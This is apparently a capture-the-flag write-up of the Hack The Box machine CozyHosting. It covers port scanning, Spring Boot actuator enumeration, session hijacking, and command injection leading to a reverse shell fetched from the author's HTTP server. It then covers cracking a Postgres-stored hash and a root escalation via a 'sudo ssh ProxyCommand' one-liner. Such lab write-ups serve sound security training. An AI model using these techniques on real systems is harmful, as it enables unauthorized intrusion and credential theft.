CozyHosting - wook413

#hackthebox #easy #linux ![[Pasted image 20250802153644.png]] # Information Gathering A TCP scan against all ports discovered 2 open ports: 22 and 80 ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -Pn -n --open --min-rate 3000 -p- -oN tcpAll Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-02 18:06 UTC Nmap scan report for 10.10.11.230 Host is up (0.051s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 17.33 seconds ``` One more TCP scan with `-sCV` flags against the two open ports found. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -sCV -p 22,80 Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-02 18:08 UTC Nmap scan report for 10.10.11.230 Host is up (0.047s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 43:56:bc:a7:f2:ec:46:dd:c1:0f:83:30:4c:2c:aa:a8 (ECDSA) |_ 256 6f:7a:6c:3f:a6:8d:e2:75:95:d4:7b:71:ac:4f:7e:42 (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-title: Did not follow redirect to http://cozyhosting.htb |_http-server-header: nginx/1.18.0 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.39 seconds ``` Lastly, a UDP scan ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -sU --top-ports 10 Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-02 18:09 UTC Nmap scan report for 10.10.11.230 Host is up (0.047s latency). PORT STATE SERVICE 53/udp closed domain 67/udp open|filtered dhcps 123/udp closed ntp 135/udp closed msrpc 137/udp closed netbios-ns 138/udp closed netbios-dgm 161/udp closed snmp 445/udp closed microsoft-ds 631/udp closed ipp 1434/udp closed ms-sql-m Nmap done: 1 IP address (1 host up) scanned in 4.86 seconds ``` --- # Enumeration ##### HTTP - TCP 80 Nmap mentions `cozyhosting.htb`. Let's add that to our `/etc/hosts` file so the domain and the IP address can be mapped to each other. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ echo "10.10.11.230 cozyhosting.htb" | sudo tee -a /etc/hosts [sudo] password for kali: 10.10.11.230 cozyhosting.htb ``` The website on port 80 appears to be a hosting service for business. ![[Pasted image 20250802131256.png]] `View Page Source` and the `footer` tells us the webpage was built with `BootstrapMade` ![[Pasted image 20250802131518.png]] ![[Pasted image 20250802131538.png]] I looked it up on `searchsploit` but there seems no known vulnerabilities to it. When I make a request to non-existing pages, I landed on `Whitelabel Error Page`. ![[Pasted image 20250802133803.png]] Google tells me the page is a default error page by `Spring Boot` applications. ![[Pasted image 20250802133903.png]] My initial `gobuster` with `directory-list-2.3-medium.txt` wordlist didn't reveal much. Since we know this web application was built using `Spring Boot`, let's try another `gobuster` with more appropriate wordlists. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ gobuster dir -u http://cozyhosting.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://cozyhosting.htb [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /index (Status: 200) [Size: 12706] /login (Status: 200) [Size: 4431] /admin (Status: 401) [Size: 97] /logout (Status: 204) [Size: 0] /error (Status: 500) [Size: 73] /http%3A%2F%2Fwww (Status: 400) [Size: 435] /http%3A%2F%2Fyoutube (Status: 400) [Size: 435] ``` There's `Java-Spring-Boot.txt` wordlist under `seclists`. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ find /usr/share/seclists/ | grep -i spring /usr/share/seclists/Discovery/Web-Content/Programming-Language-Specific/Java-Spring-Boot.txt ``` This time we hit several 200 responses. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ gobuster dir -u http://cozyhosting.htb -w /usr/share/seclists/Discovery/Web-Content/Programming-Language-Specific/Java-Spring-Boot.txt =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://cozyhosting.htb [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/Programming-Language-Specific/Java-Spring-Boot.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /actuator (Status: 200) [Size: 634] /actuator/env/lang (Status: 200) [Size: 487] /actuator/env/path (Status: 200) [Size: 487] /actuator/env/home (Status: 200) [Size: 487] /actuator/env (Status: 200) [Size: 4957] /actuator/health (Status: 200) [Size: 15] /actuator/mappings (Status: 200) [Size: 9938] /actuator/beans (Status: 200) [Size: 127224] /actuator/sessions (Status: 200) [Size: 48] Progress: 120 / 121 (99.17%) =============================================================== Finished =============================================================== ``` I found `kanderson` under `/actuator/sessions`. This might be the session ID for the user `kanderson`. ![[Pasted image 20250802135636.png]] I opened up my `Inspect` tool and replaced my current sessions cookie with kanderson's. ![[Pasted image 20250802135917.png]] Then when I refreshed the page, the `login` page button was gone. ![[Pasted image 20250802140018.png]] I navigated to `/admin` and I was successfully logged in as `K. Anderson`. ![[Pasted image 20250802140043.png]] # Initial Access - Shell as `app` Scrolled down a bit, I found `connection setting` ![[Pasted image 20250802140724.png]] Intercepted the traffic, moved to Burp and I tweaked with the parameters for a while and I noticed it's vulnerable to command execution. ![[Pasted image 20250802143336.png]] At first, I was trying to obtain a reverse shell right away but after a lot of failed attempts, I decided to first write a reverse shell script on the target host, execute it, and get a reverse shell. ![[Pasted image 20250802145207.png]] The code in the screenshot above finally worked and it connected to my Python server and grabbed my payload. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.11.230 - - [02/Aug/2025 19:51:42] "GET /payload HTTP/1.1" 200 - ``` Then I executed the payload on the server. ![[Pasted image 20250802145359.png]] Finally got a reverse shell as `app` ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nc -lvnp 1234 listening on [any] 1234 ... ^[[Aconnect to [10.10.14.14] from (UNKNOWN) [10.10.11.230] 36720 bash: cannot set terminal process group (1064): Inappropriate ioctl for device bash: no job control in this shell app@cozyhosting:/app$ whoami whoami app app@cozyhosting:/app$ ``` # Lateral Movement - Shell as `josh` In `/app`, there was `cloudhosting-0.0.1.jar` file. I copied it to `/dev/shm` to unzip it. ```bash app@cozyhosting:/app$ ls cloudhosting-0.0.1.jar app@cozyhosting:/app$ cp cloudhosting-0.0.1.jar /dev/shm/ ``` I unzipped the file and recursively searched for `password` strings. I got a few hits but the one stood out to me was `application.properties` file. ```bash app@cozyhosting:/dev/shm$ grep -Horni password . 2>/dev/null ./BOOT-INF/classes/application.properties:12:password ./BOOT-INF/classes/templates/login.html:57:Password ./BOOT-INF/classes/templates/login.html:57:Password ./BOOT-INF/classes/templates/login.html:58:password ./BOOT-INF/classes/templates/login.html:58:password ./BOOT-INF/classes/templates/login.html:58:Password ./BOOT-INF/classes/templates/login.html:60:password ./BOOT-INF/classes/templates/login.html:73:password ./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.symbol.svg:6155:password ./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.symbol.svg:6160:password ./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.svg:3710:password ./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.svg:3713:password ./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.less:1277:password ./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.less:1278:password ./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.css:1276:password ./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.css:1277:password ``` I pulled up the file and it contained `postgres` credentials. ```bash app@cozyhosting:/dev/shm$ cat BOOT-INF/classes/application.properties server.address=127.0.0.1 server.servlet.session.timeout=5m management.endpoints.web.exposure.include=health,beans,env,sessions,mappings management.endpoint.sessions.enabled = true spring.datasource.driver-class-name=org.postgresql.Driver spring.jpa.database-platform=org.hibernate.dialect.PostgreSQLDialect spring.jpa.hibernate.ddl-auto=none spring.jpa.database=POSTGRESQL spring.datasource.platform=postgres spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting spring.datasource.username=postgres spring.datasource.password=Vg&nvzAQ7XxR app@cozyhosting:/dev/shm$ ``` I logged into `PostgresDB` using `psql` ```bash app@cozyhosting:/dev/shm$ psql -h localhost -U postgres Password for user postgres: psql (14.9 (Ubuntu 14.9-0ubuntu0.22.04.1)) SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, bits: 256, compression: off) Type "help" for help. postgres=# ``` `\list` to see all the existing databases. ![[Pasted image 20250802151844.png]] `\c cozyhosting` to select `cozyhosting` as the database and `\d` for list all the tables under the db. ![[Pasted image 20250802151924.png]] `select * from users;` ![[Pasted image 20250802152203.png]] `hashcat` cracked `admin`'s hash, which turned out to be `manchesterunited` in plaintext. ```bash $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm:manchesterunited ``` ```bash app@cozyhosting:/dev/shm$ su josh Password: josh@cozyhosting:/dev/shm$ whoami josh josh@cozyhosting:/dev/shm$ ``` # Privilege Escalation - Shell as `root` Found `user.txt` ```bash josh@cozyhosting:~$ ls user.txt josh@cozyhosting:~$ cat user.txt 261... ``` `sudo -l` revealed that `josh` can run `/usr/bin/ssh` commands as `root` privileges. ```bash josh@cozyhosting:~$ sudo -l [sudo] password for josh: Matching Defaults entries for josh on localhost: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty User josh may run the following commands on localhost: (root) /usr/bin/ssh * ``` `GTFObins` taught me I can run the following command as it does not drop the elevated privileges. ```bash josh@cozyhosting:~$ sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x [sudo] password for josh: # whoami root ``` Found `root.txt` ```bash # cd /root # ls root.txt # cat root.txt d38f... ```